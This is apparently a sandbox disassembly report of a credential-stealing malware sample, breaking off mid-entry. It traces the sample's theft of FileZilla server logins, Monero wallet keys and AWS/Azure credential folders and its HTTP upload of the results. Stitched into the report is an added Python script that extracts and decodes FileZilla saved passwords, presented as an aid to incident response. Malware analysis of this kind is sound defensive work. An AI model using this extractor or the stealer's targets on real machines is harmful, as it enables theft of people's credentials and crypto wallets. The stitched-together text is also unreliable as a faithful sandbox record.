                  • GetProcessHeap.KERNEL32(00000000,000F423F,00640DBA,00640DB7,00640DB6,00640DB3), ref: 00630362
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00630369
                  • StrStrA.SHLWAPI(00000000,<Host>), ref: 00630385
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630393
                  • StrStrA.SHLWAPI(00000000,<Port>), ref: 006303CF
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 006303DD
                  • StrStrA.SHLWAPI(00000000,<User>), ref: 00630419
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630427
                  • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00630463
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630475
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630502
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 0063051A
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 00630532
                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 0063054A
                  • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00630562
                  • lstrcat.KERNEL32(?,profile: null), ref: 00630571
                  • lstrcat.KERNEL32(?,url: ), ref: 00630580
                  • lstrcat.KERNEL32(?,00000000), ref: 00630593
                  • lstrcat.KERNEL32(?,00641678), ref: 006305A2
                  • lstrcat.KERNEL32(?,00000000), ref: 006305B5
                  • lstrcat.KERNEL32(?,0064167C), ref: 006305C4
                  • lstrcat.KERNEL32(?,login: ), ref: 006305D3
                  • lstrcat.KERNEL32(?,00000000), ref: 006305E6
                  • lstrcat.KERNEL32(?,00641688), ref: 006305F5
                  • lstrcat.KERNEL32(?,password: ), ref: 00630604
                  • lstrcat.KERNEL32(?,00000000), ref: 00630617
                  • lstrcat.KERNEL32(?,00641698), ref: 00630626
                  • lstrcat.KERNEL32(?,0064169C), ref: 00630635
                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00640DB2), ref: 0063068E
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                  • API String ID: 1942843190-555421843
                  • Opcode ID: 573f487dbc3a709c2761e4b3818a7ca22db38d4bd5633884ce251d451b2c6807
                  • Instruction ID: 8a5d3c8d23b8979e92f232460d89f195ef8a8b9412ab45300a398abb68339292
                  • Opcode Fuzzy Hash: 573f487dbc3a709c2761e4b3818a7ca22db38d4bd5633884ce251d451b2c6807
                  • Instruction Fuzzy Hash: C6D13D72900208ABDB48EBF0DD96EEE737ABF14300F454418F142B7191DF74AA4ADBA5
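The function above searches FileZilla's recentservers.xml with StrStrA for the literal tags <Host>, <Port>, <User> and <Pass encoding="base64">, then concatenates a "browser: FileZilla / profile: null / url: / login: / password:" record. The following is an added example, not the sample's code and not Joe Sandbox output: it reproduces that tag-search extraction in Python over a constructed recentservers.xml so a responder can see exactly what an infected host leaks from that file. The XML, the host names and the credentials are invented; the "host:port" form of the url line is an assumption, since the report shows the separator strings only as addresses (00641678, 0064167C).

```python
"""Added example: mimic the StrStrA-based FileZilla recentservers.xml
extraction shown in the report. Not the sample's code; SAMPLE_XML is
constructed for this example."""
import base64
import binascii
import re

# Constructed recentservers.xml: two <Server> entries, one with a
# base64-encoded password and one saved without credentials.
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<FileZilla3 version="3.66.4" platform="windows">
  <RecentServers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding="base64">aHVudGVyMg==</Pass>
    </Server>
    <Server>
      <Host>sftp.example.test</Host>
      <Port>22</Port>
      <Protocol>1</Protocol>
      <User>bob</User>
    </Server>
  </RecentServers>
</FileZilla3>
"""


def _between(text, open_tag, close_tag):
    """StrStrA-style lookup: first occurrence of open_tag, text up to
    the next close_tag. Returns None when either tag is missing."""
    start = text.find(open_tag)
    if start < 0:
        return None
    start += len(open_tag)
    end = text.find(close_tag, start)
    return text[start:end] if end >= 0 else None


def extract_filezilla_servers(xml_text):
    """Walk each <Server> element and pull the four fields the sample
    searches for. FileZilla stores the password base64-encoded, not
    encrypted, so decoding it is all that is needed."""
    records = []
    for block in re.findall(r"<Server>(.*?)</Server>", xml_text, re.S):
        encoded = _between(block, '<Pass encoding="base64">', "</Pass>")
        password = None
        if encoded is not None:
            try:
                password = base64.b64decode(encoded, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                password = None  # malformed entry: keep the record, drop the secret
        records.append({
            "host": _between(block, "<Host>", "</Host>"),
            "port": _between(block, "<Port>", "</Port>"),
            "user": _between(block, "<User>", "</User>"),
            "password": password,
        })
    return records


def format_stealc_record(rec):
    """Build the record in the line layout the report's lstrcat chain
    produces. Assumption: the url line is "host:port"; the separators
    between fields are not visible in the report."""
    url = rec["host"] or ""
    if rec["port"]:
        url = f"{url}:{rec['port']}"
    return "\n".join([
        "browser: FileZilla",
        "profile: null",
        f"url: {url}",
        f"login: {rec['user'] or ''}",
        f"password: {rec['password'] or ''}",
    ])


if __name__ == "__main__":
    for rec in extract_filezilla_servers(SAMPLE_XML):
        print(format_stealc_record(rec))
        print()
```

The practical point for incident response is the second function: anything that was ever in recentservers.xml (and, by the same encoding, in sitemanager.xml) on the infected host must be treated as disclosed and rotated, because the "encoding" attribute is base64, not a cipher. The `_between` helper mirrors StrStrA's first-match semantics; a real XML parser would be more robust, but the naive search is what the report shows, and it is enough to recover every field the stealer recovers.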
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 006259F8
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 00625A13
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00625B93
                  • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0131F720,00000000,?,0131B408,00000000,?,00641A1C), ref: 00625E71
                  • lstrlen.KERNEL32(00000000), ref: 00625E82
                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00625E93
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00625E9A
                  • lstrlen.KERNEL32(00000000), ref: 00625EAF
                  • lstrlen.KERNEL32(00000000), ref: 00625ED8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00625EF1
                  • lstrlen.KERNEL32(00000000,?,?), ref: 00625F1B
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00625F2F
                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00625F4C
                  • InternetCloseHandle.WININET(00000000), ref: 00625FB0
                  • InternetCloseHandle.WININET(00000000), ref: 00625FBD
                  • HttpOpenRequestA.WININET(00000000,0131F6E0,?,0131F490,00000000,00000000,00400100,00000000), ref: 00625BF8
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • InternetCloseHandle.WININET(00000000), ref: 00625FC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 874700897-2180234286
                  • Opcode ID: 97c032fe7e7a5ca01349a81069fb896fd2b8eaf5a03ba2ab9f890eb953d11ad6
                  • Instruction ID: cba2c28a527f95191b0d7e17096edb8fe5aefbe79fea6caa399db719c10bc3aa
                  • Opcode Fuzzy Hash: 97c032fe7e7a5ca01349a81069fb896fd2b8eaf5a03ba2ab9f890eb953d11ad6
                  • Instruction Fuzzy Hash: 4B120E71820118AADB55EBE0DC95FEEB37ABF14700F4141ADF14672091EF702A49DFA9
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 00638B60: GetSystemTime.KERNEL32(00640E1A,0131B558,006405AE,?,?,006213F9,?,0000001A,00640E1A,00000000,?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 00638B86
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0062CF83
                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0062D0C7
                  • RtlAllocateHeap.NTDLL(00000000), ref: 0062D0CE
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D208
                  • lstrcat.KERNEL32(?,00641478), ref: 0062D217
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D22A
                  • lstrcat.KERNEL32(?,0064147C), ref: 0062D239
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D24C
                  • lstrcat.KERNEL32(?,00641480), ref: 0062D25B
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D26E
                  • lstrcat.KERNEL32(?,00641484), ref: 0062D27D
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D290
                  • lstrcat.KERNEL32(?,00641488), ref: 0062D29F
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D2B2
                  • lstrcat.KERNEL32(?,0064148C), ref: 0062D2C1
                  • lstrcat.KERNEL32(?,00000000), ref: 0062D2D4
                  • lstrcat.KERNEL32(?,00641490), ref: 0062D2E3
                    • Part of subcall function 0063A820: lstrlen.KERNEL32(00624F05,?,?,00624F05,00640DDE), ref: 0063A82B
                    • Part of subcall function 0063A820: lstrcpy.KERNEL32(00640DDE,00000000), ref: 0063A885
                  • lstrlen.KERNEL32(?), ref: 0062D32A
                  • lstrlen.KERNEL32(?), ref: 0062D339
                    • Part of subcall function 0063AA70: StrCmpCA.SHLWAPI(013190E0,0062A7A7,?,0062A7A7,013190E0), ref: 0063AA8F
                  • DeleteFileA.KERNEL32(00000000), ref: 0062D3B4
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                  • String ID:
                  • API String ID: 1956182324-0
                  • Opcode ID: ae024a86908f943250cd5022d4e07aee00b02c0e61fd1605a36e0b36299db938
                  • Instruction ID: e2e7e7971ebd5f2a6bbed1f60bb5f3897f8eece1dcc4dbbab4a1981ddd7ce920
                  • Opcode Fuzzy Hash: ae024a86908f943250cd5022d4e07aee00b02c0e61fd1605a36e0b36299db938
                  • Instruction Fuzzy Hash: 33E13D72910108ABCB48EBE0DD96EEE737ABF14300F114168F147B7191DE75AA05EFA6
                  APIs
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                    • Part of subcall function 006247B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00624839
                    • Part of subcall function 006247B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00624849
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00624915
                  • StrCmpCA.SHLWAPI(?,0131F730), ref: 0062493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00624ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00640DDB,00000000,?,?,00000000,?,",00000000,?,0131F8A0), ref: 00624DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00624E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00624E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00624E49
                  • InternetCloseHandle.WININET(00000000), ref: 00624EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00624EC5
                  • HttpOpenRequestA.WININET(00000000,0131F6E0,?,0131F490,00000000,00000000,00400100,00000000), ref: 00624B15
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                  • InternetCloseHandle.WININET(00000000), ref: 00624ECF
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 0fb14be02842b304658cebc764a406801f7d2a636bf0412b4cb1d9ee73d22ef2
                  • Instruction ID: b8430d4f96bfbefe899a1ce00ec80864f7f3e11d646c48d5f7b55bbb077e324e
                  • Opcode Fuzzy Hash: 0fb14be02842b304658cebc764a406801f7d2a636bf0412b4cb1d9ee73d22ef2
                  • Instruction Fuzzy Hash: 2A12D672911118AADB59EB90DC92FEEB33AAF14300F51419DB14672091EF702F49DFAA
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                    • Part of subcall function 0063A920: lstrcpy.KERNEL32(00000000,?), ref: 0063A972
                    • Part of subcall function 0063A920: lstrcat.KERNEL32(00000000), ref: 0063A982
                    • Part of subcall function 0063A8A0: lstrcpy.KERNEL32(?,00640E17), ref: 0063A905
                    • Part of subcall function 0063A9B0: lstrlen.KERNEL32(?,01318F10,?,\Monero\wallet.keys,00640E17), ref: 0063A9C5
                    • Part of subcall function 0063A9B0: lstrcpy.KERNEL32(00000000), ref: 0063AA04
                    • Part of subcall function 0063A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0063AA12
                  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0131E568,00000000,?,0064144C,00000000,?,?), ref: 0062CA6C
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0062CA89
                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0062CA95
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0062CAA8
                  • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0062CAD9
                  • StrStrA.SHLWAPI(?,0131E5F8,00640B52), ref: 0062CAF7
                  • StrStrA.SHLWAPI(00000000,0131E4F0), ref: 0062CB1E
                  • StrStrA.SHLWAPI(?,0131EBD0,00000000,?,00641458,00000000,?,00000000,00000000,?,01319190,00000000,?,00641454,00000000,?), ref: 0062CCA2
                  • StrStrA.SHLWAPI(00000000,0131EA50), ref: 0062CCB9
                    • Part of subcall function 0062C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0062C871
                    • Part of subcall function 0062C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0062C87C
                  • StrStrA.SHLWAPI(?,0131EA50,00000000,?,0064145C,00000000,?,00000000,013191B0), ref: 0062CD5A
                  • StrStrA.SHLWAPI(00000000,01319000), ref: 0062CD71
                    • Part of subcall function 0062C820: lstrcat.KERNEL32(?,00640B46), ref: 0062C943
                    • Part of subcall function 0062C820: lstrcat.KERNEL32(?,00640B47), ref: 0062C957
                    • Part of subcall function 0062C820: lstrcat.KERNEL32(?,00640B4E), ref: 0062C978
                  • lstrlen.KERNEL32(00000000), ref: 0062CE44
                  • CloseHandle.KERNEL32(00000000), ref: 0062CE9C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                  • String ID:
                  • API String ID: 3744635739-3916222277
                  • Opcode ID: 7a1e719ee738a982bf2a5e6e8a712eb1c1d7243239433ad112d975d55dbe5b70
                  • Instruction ID: 44771cc84709cb734bd766476f873e9497a94e4d7484946953368d11ef34b448
                  • Opcode Fuzzy Hash: 7a1e719ee738a982bf2a5e6e8a712eb1c1d7243239433ad112d975d55dbe5b70
                  • Instruction Fuzzy Hash: 99E1FA71810108ABDB58EBE0DC92FEEB77AAF14300F41415DF14676191EF706A4ADFAA
                  APIs
                    • Part of subcall function 0063A740: lstrcpy.KERNEL32(00640E17,00000000), ref: 0063A788
                  • RegOpenKeyExA.ADVAPI32(00000000,0131C618,00000000,00020019,00000000,006405B6), ref: 006383A4
                  • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00638426
                  • wsprintfA.USER32 ref: 00638459
                  • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0063847B
                  • RegCloseKey.ADVAPI32(00000000), ref: 0063848C
                  • RegCloseKey.ADVAPI32(00000000), ref: 00638499
                    • Part of subcall function 0063A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0063A7E6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseOpenlstrcpy$Enumwsprintf
                  • String ID: - $%s\%s$?
                  • API String ID: 3246050789-3278919252
                  • Opcode ID: 339b3db7b9e0ddf2aa9970604a172dcb65310dbd8b191021cd58a2ef97e62e7c
                  • Instruction ID: 4830a3a29a216dd60b9d1f826dd1ab7582f842c7e4abcc9886d981a776fea40c
                  • Opcode Fuzzy Hash: 339b3db7b9e0ddf2aa9970604a172dcb65310dbd8b191021cd58a2ef97e62e7c
                  • Instruction Fuzzy Hash: 62811D71911218ABEB68DB50CC95FEA77B9FF48700F008298F149A6180DF716B85CFD5
                  APIs
                    • Part of subcall function 00638DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00638E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 00634DB0
                  • lstrcat.KERNEL32(?,\.azure\), ref: 00634DCD
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 0063492C
                    • Part of subcall function 00634910: FindFirstFileA.KERNEL32(?,?), ref: 00634943
                  • lstrcat.KERNEL32(?,00000000), ref: 00634E3C
                  • lstrcat.KERNEL32(?,\.aws\), ref: 00634E59
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FDC), ref: 00634971
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,00640FE0), ref: 00634987
                    • Part of subcall function 00634910: FindNextFileA.KERNEL32(000000FF,?), ref: 00634B7D
                    • Part of subcall function 00634910: FindClose.KERNEL32(000000FF), ref: 00634B92
                  • lstrcat.KERNEL32(?,00000000), ref: 00634EC8
                  • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00634EE5
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 006349B0
                    • Part of subcall function 00634910: StrCmpCA.SHLWAPI(?,006408D2), ref: 006349C5
                    • Part of subcall function 00634910: wsprintfA.USER32 ref: 006349E2
                    • Part of subcall function 00634910: PathMatchSpecA.SHLWAPI(?,?), ref: 00634A1E
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,0131F7E0), ref: 00634A4A
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,00640FF8), ref: 00634A5C
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,?), ref: 00634A70
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,00640FFC), ref: 00634A82
                    • Part of subcall function 00634910: lstrcat.KERNEL32(?,?), ref: 00634A96
                    • Part of subcall function 00634910: CopyFileA.KERNEL32(?,?,00000001), ref: 00634AAC
                    • Part of subcall function 00634910: DeleteFileA.KERNEL32(?), ref: 00634B31
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                  • API String ID: 949356159-974132213
                  • Opcode ID: ced422b53be877b10cba3cd47b0ff9c0023116e2cd427fb08e5e6b37ab61a9cb
                  • Instruction ID: db950c19b709da4063da643b8015f7a9f0ddcf0f708c7ae1195289c4d3d92858
                  • Opcode Fuzzy Hash: ced422b53be877b10cba3cd47b0ff9c0023116e2cd427fb08e5e6b37ab61a9cb
                  • Instruction Fuzzy Hash: 4341D4BA94020867CB54F770EC47FED7339AB25700F014498B689660C1EEB5ABC9CBD2
                  APIs
                  • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0063906C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2145909284.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                  • Associated: 00000000.00000002.2145805654.0000000000620000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006D1000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.00000000006DD000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.0000000000702000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2145909284.000000000086A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.000000000087E000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000A02000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B0C000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146193055.0000000000B1A000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146591662.0000000000B1B000.00000080.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146699126.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.2146755753.0000000000CB4000.00000080.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_620000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateGlobalStream
                  • String ID: image/jpeg
                  • API String ID: 2244384528-3785015651
                  • Opcode ID: 383de669e500d8f03e43a8500a823be3bbcf80a0fa62e6491a7a35f21efa5c06
                  • Instruction ID: 0d551032674b2423b3261ca401b3ba674eed8bcd3e0a489a369f9531314dca0b
